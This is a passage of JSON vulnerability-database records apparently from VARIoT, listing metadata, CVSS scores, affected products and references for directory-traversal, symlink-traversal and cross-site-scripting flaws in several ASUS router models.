"db": "NVD",
"id": "CVE-2013-4937"
}
]
},
"id": "VAR-201307-0434",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-08385"
},
{
"db": "VULHUB",
"id": "VHN-64939"
}
],
"trust": 1.291374855714286
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-08385"
}
]
},
"last_update_date": "2025-04-11T22:55:57.018000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Firmware update 3.0.4.372 for ASUS routers with AiCloud fixes found vulnerabilities",
"trust": 0.8,
"url": "http://twitter.com/ASUSUSA/statuses/357612236392509440"
},
{
"title": "Networking",
"trust": 0.8,
"url": "http://www.asus.com/Networking/Wireless_Routers_Products/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-003514"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2013-4937"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://twitter.com/asususa/statuses/357612236392509440"
},
{
"trust": 1.7,
"url": "http://reviews.cnet.com/8301-3132_7-57594003-98"
},
{
"trust": 1.2,
"url": "http://www.securityfocus.com/bid/60780"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-4937"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-4937"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-08385"
},
{
"db": "VULHUB",
"id": "VHN-64939"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-003514"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-145"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-570"
},
{
"db": "NVD",
"id": "CVE-2013-4937"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2013-08385"
},
{
"db": "VULHUB",
"id": "VHN-64939"
},
{
"db": "BID",
"id": "60780"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-003514"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-145"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-570"
},
{
"db": "NVD",
"id": "CVE-2013-4937"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-06-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-08385"
},
{
"date": "2013-07-26T00:00:00",
"db": "VULHUB",
"id": "VHN-64939"
},
{
"date": "2013-06-24T00:00:00",
"db": "BID",
"id": "60780"
},
{
"date": "2013-07-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-003514"
},
{
"date": "2013-06-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201307-145"
},
{
"date": "2013-07-29T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201307-570"
},
{
"date": "2013-07-26T12:05:40.867000",
"db": "NVD",
"id": "CVE-2013-4937"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-06-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-08385"
},
{
"date": "2013-07-26T00:00:00",
"db": "VULHUB",
"id": "VHN-64939"
},
{
"date": "2013-07-29T13:14:00",
"db": "BID",
"id": "60780"
},
{
"date": "2013-07-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-003514"
},
{
"date": "2013-07-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201307-145"
},
{
"date": "2013-08-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201307-570"
},
{
"date": "2025-04-11T00:51:21.963000",
"db": "NVD",
"id": "CVE-2013-4937"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201307-145"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-570"
}
],
"trust": 1.2
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ASUS RT-N66U Directory Traversal Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-08385"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-145"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "path traversal",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201307-145"
}
],
"trust": 0.6
}
}
VAR-201911-1519
Vulnerability from variot - Updated: 2024-11-23 23:01Symlink Traversal vulnerability in ASUS RT-AC66U and RT-N56U due to misconfiguration in the SMB service. ASUS RT-AC66U and RT-N56U Contains a path traversal vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201911-1519",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "rt-ac66u",
"scope": "eq",
"trust": 2.2,
"vendor": "asus",
"version": null
},
{
"model": "rt-n56u",
"scope": "eq",
"trust": 2.2,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac66u",
"scope": null,
"trust": 0.8,
"vendor": "asustek computer",
"version": null
},
{
"model": "rt-n56u",
"scope": null,
"trust": 0.8,
"vendor": "asustek computer",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-006951"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-727"
},
{
"db": "NVD",
"id": "CVE-2013-4656"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:asus:rt-ac66u_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asus:rt-n56u_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-006951"
}
]
},
"cve": "CVE-2013-4656",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2013-4656",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2013-4656",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2013-4656",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2013-4656",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2013-4656",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNNVD",
"id": "CNNVD-201911-727",
"trust": 0.6,
"value": "CRITICAL"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-006951"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-727"
},
{
"db": "NVD",
"id": "CVE-2013-4656"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Symlink Traversal vulnerability in ASUS RT-AC66U and RT-N56U due to misconfiguration in the SMB service. ASUS RT-AC66U and RT-N56U Contains a path traversal vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-4656"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006951"
}
],
"trust": 1.62
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-4656",
"trust": 2.4
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006951",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201911-727",
"trust": 0.6
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-006951"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-727"
},
{
"db": "NVD",
"id": "CVE-2013-4656"
}
]
},
"id": "VAR-201911-1519",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.539042785
},
"last_update_date": "2024-11-23T23:01:34.738000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.asus.com/us/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-006951"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-22",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-006951"
},
{
"db": "NVD",
"id": "CVE-2013-4656"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://www.ise.io/casestudies/exploiting-soho-routers/"
},
{
"trust": 1.6,
"url": "https://www.ise.io/wp-content/uploads/2017/07/soho_techreport.pdf"
},
{
"trust": 1.6,
"url": "https://www.ise.io/soho_service_hacks/"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-4656"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-4656"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-006951"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-727"
},
{
"db": "NVD",
"id": "CVE-2013-4656"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2013-006951"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-727"
},
{
"db": "NVD",
"id": "CVE-2013-4656"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-11-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-006951"
},
{
"date": "2019-11-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201911-727"
},
{
"date": "2019-11-13T15:15:09.963000",
"db": "NVD",
"id": "CVE-2013-4656"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-11-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-006951"
},
{
"date": "2019-12-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201911-727"
},
{
"date": "2024-11-21T01:56:00.100000",
"db": "NVD",
"id": "CVE-2013-4656"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201911-727"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ASUS RT-AC66U and RT-N56U Path traversal vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-006951"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "path traversal",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201911-727"
}
],
"trust": 0.6
}
}
VAR-202001-1689
Vulnerability from variot - Updated: 2024-11-23 23:01ASUS WRT-AC66U 3 RT 3.0.0.4.372_67 devices allow XSS via the Client Name field to the Parental Control feature. ASUS WRT-AC66U 3 RT Contains a cross-site scripting vulnerability.The information may be obtained and the information may be falsified. ASUS WRT-AC66U is a product of Taiwan ASUS Corporation.
A cross-site scripting vulnerability exists in ASUS WRT-AC66U. The vulnerability stems from the lack of proper validation of client data by web applications. An attacker could use this vulnerability to execute client code
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202001-1689",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "rt-ac66u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.372_67"
},
{
"model": "rt-ac66u",
"scope": "eq",
"trust": 0.8,
"vendor": "asustek computer",
"version": null
},
{
"model": "rt-ac66u",
"scope": "eq",
"trust": 0.8,
"vendor": "asustek computer",
"version": "rt-ac66u firmware 3.0.0.4.372_67"
},
{
"model": "wrt-ac66u",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-04914"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-001472"
},
{
"db": "NVD",
"id": "CVE-2020-7997"
}
]
},
"cve": "CVE-2020-7997",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2020-7997",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 6.4,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2020-04914",
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"id": "CVE-2020-7997",
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.1,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2020-7997",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2020-7997",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2020-7997",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2020-04914",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202001-1236",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-04914"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-001472"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-1236"
},
{
"db": "NVD",
"id": "CVE-2020-7997"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ASUS WRT-AC66U 3 RT 3.0.0.4.372_67 devices allow XSS via the Client Name field to the Parental Control feature. ASUS WRT-AC66U 3 RT Contains a cross-site scripting vulnerability.The information may be obtained and the information may be falsified. ASUS WRT-AC66U is a product of Taiwan ASUS Corporation. \n\r\n\r\nA cross-site scripting vulnerability exists in ASUS WRT-AC66U. The vulnerability stems from the lack of proper validation of client data by web applications. An attacker could use this vulnerability to execute client code",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-7997"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-001472"
},
{
"db": "CNVD",
"id": "CNVD-2020-04914"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-7997",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2020-001472",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2020-04914",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202001-1236",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-04914"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-001472"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-1236"
},
{
"db": "NVD",
"id": "CVE-2020-7997"
}
]
},
"id": "VAR-202001-1689",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-04914"
}
],
"trust": 1.35703795
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-04914"
}
]
},
"last_update_date": "2024-11-23T23:01:32.365000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "RTAC66U",
"trust": 0.8,
"url": "https://www.asus.com/Networking/RTAC66U/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-001472"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.0
},
{
"problemtype": "Cross-site scripting (CWE-79) [NVD Evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-001472"
},
{
"db": "NVD",
"id": "CVE-2020-7997"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.0,
"url": "https://gist.github.com/adeshkolte/983bcadd82cc1fd60333098eb646ef68"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-7997"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-04914"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-001472"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-1236"
},
{
"db": "NVD",
"id": "CVE-2020-7997"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-04914"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-001472"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-1236"
},
{
"db": "NVD",
"id": "CVE-2020-7997"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-02-13T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-04914"
},
{
"date": "2020-02-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-001472"
},
{
"date": "2020-01-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202001-1236"
},
{
"date": "2020-01-28T05:15:11.447000",
"db": "NVD",
"id": "CVE-2020-7997"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-02-13T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-04914"
},
{
"date": "2020-02-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-001472"
},
{
"date": "2021-01-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202001-1236"
},
{
"date": "2024-11-21T05:38:10.003000",
"db": "NVD",
"id": "CVE-2020-7997"
}
]
},
"title": {
"@context": {
